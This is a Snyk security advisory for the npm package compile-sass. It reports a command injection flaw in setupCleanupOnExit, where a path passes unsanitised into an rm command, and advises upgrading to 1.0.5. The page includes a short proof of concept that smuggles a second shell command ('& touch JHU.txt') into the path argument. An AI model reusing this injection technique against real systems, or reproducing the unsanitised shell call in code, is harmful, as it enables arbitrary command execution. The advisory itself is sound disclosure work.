compile-sass@1.0.1 vulnerabilities

A module to compile SASS on-the-fly and/or save it to CSS files

Direct Vulnerabilities

Known vulnerabilities in the compile-sass package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • H
Command Injection

compile-sass is a module to compile SASS on-the-fly and/or save it to CSS files.

Affected versions of this package are vulnerable to Command Injection. The function setupCleanupOnExit(cssPath) within dist/index.js is executed as part of the rm command without any sanitization.

PoC by JHU System Security Lab

function sleep(millis) {
    return new Promise(resolve => setTimeout(resolve, millis));
}
async function main(){
    var a = require('compile-sass');
    a.setupCleanupOnExit('& touch JHU.txt');
    console.log('Press Ctrl-C in 3 seconds...')
    await sleep(3000);
}
main();

How to fix Command Injection?

Upgrade compile-sass to version 1.0.5 or higher.

<1.0.5